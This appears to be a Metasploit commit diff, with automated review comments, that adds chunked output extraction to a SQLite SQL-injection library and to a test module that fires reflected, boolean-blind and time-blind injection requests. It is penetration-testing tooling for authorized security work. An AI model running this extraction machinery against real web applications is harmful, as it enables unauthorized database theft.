add truncated SQLi in SQLite, and update test module to add it as an option

This commit is contained in:
Niboucha Redouane 2020-06-25 16:14:25 +02:00
parent 8f9a849591
commit 4374edd37a
2 changed files with 30 additions and 12 deletions


@ -9,7 +9,7 @@ module Msf::Exploit::SQLi::SQLitei
decode: proc { |data| Rex::Text.hex_to_raw(data) }
}
}.freeze
def initialize(opts, &query_proc)
def initialize(opts={}, &query_proc)
opts[:concat_separator] ||= ','
if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
opts[:encoder] = opts[:encoder].downcase.intern
@ -81,6 +81,20 @@ module Msf::Exploit::SQLi::SQLitei
private
def truncated_query(query)
result = [ ]
offset = 1
loop do
slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
offset += @truncation_length # should be same as @truncation_length for most cases
result << slice
vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
break if slice.length < @truncation_length
end
result.join
end
def call_function(function)
function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
output = nil
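Review bot: The `loop do` in `truncated_query` has no upper bound, so if the target keeps answering with a body of at least `@truncation_length` characters that is not the real query output (a fixed-size error page, for instance) the `break if slice.length < @truncation_length` condition is never met and the loop runs forever while `result` grows without limit; cap the number of chunks, e.g. `break if slice.length < @truncation_length || result.size >= MAX_TRUNCATED_CHUNKS` with a documented constant (name constructed here), and print a warning when the cap is hit. The inline comment on `offset += @truncation_length` ("should be same as @truncation_length for most cases") does not say what it means; since the line already adds `@truncation_length`, replace it with `# advance by one truncated chunk; if the block returned more than @truncation_length, the excess is re-fetched on the next iteration`. A short header comment above the method would help too: `# Fetches the full output of +query+ in @truncation_length-sized chunks by substituting ^OFFSET^ with the current 1-based offset and concatenating the slices.` `call_function` continues past the end of the hunk.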


@ -28,18 +28,19 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RHOST('127.0.0.1'),
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptInt.new('SQLI_TYPE', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
OptString.new('ENCODER', [false, 'an encoder to use (hex for example)', '']),
OptBool.new('HEX_ENCODE_STRINGS', [false, 'replace strings in the query with hex numbers?', false]),
OptInt.new('SqliType', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
OptString.new('Encoder', [false, 'an encoder to use (hex for example)', '']),
OptBool.new('HexEncodeStrings', [false, 'Replace strings in the query with hex numbers?', false]),
OptInt.new('TruncationLength', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0])
]
)
end
def boolean_blind
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
sqli = SQLitei::BooleanBasedBlind.new({
encoder: encoder,
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
hex_encode_strings: datastore['HexEncodeStrings']
}) do |payload|
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
@ -59,10 +60,12 @@ class MetasploitModule < Msf::Auxiliary
end
def reflected
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
sqli = SQLitei::Common.new({
encoder: encoder,
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
hex_encode_strings: datastore['HexEncodeStrings'],
truncation_length: truncation
}) do |payload|
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
@ -78,7 +81,8 @@ class MetasploitModule < Msf::Auxiliary
if !body
''
else
body.strip
body = body.strip
truncation ? body[0, truncation] : body
end
end
end
@ -90,10 +94,10 @@ class MetasploitModule < Msf::Auxiliary
end
def time_blind
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
sqli = SQLitei::TimeBasedBlind.new({
encoder: encoder,
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
hex_encode_strings: datastore['HexEncodeStrings'],
}) do |payload|
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
@ -139,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
end
def run
case datastore['SQLI_TYPE']
case datastore['SqliType']
when 0 then reflected
when 1 then boolean_blind
when 2 then time_blind
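Review bot: The new `TruncationLength` option is only honoured in `reflected` (`truncation_length: truncation` is passed to `SQLitei::Common.new`), while `boolean_blind` and `time_blind` still construct their SQLi objects without it, yet the option description reads as if it applied to every `SqliType`; make that explicit in the description, e.g. `'Test SQLi with truncated output; only used when SqliType is 0 (0 or negative to disable)'`. Note also that `body[0, truncation]` truncates by character count, which only matches a byte-oriented truncation on the server side when the output is ASCII (true for the hex encoder, presumably not for raw output containing multibyte text); a one-line comment stating that assumption on that line would save the next reader a guess. The `case` in `run` continues outside the hunk, so whether an `else` branch handles an out-of-range `SqliType` cannot be seen here.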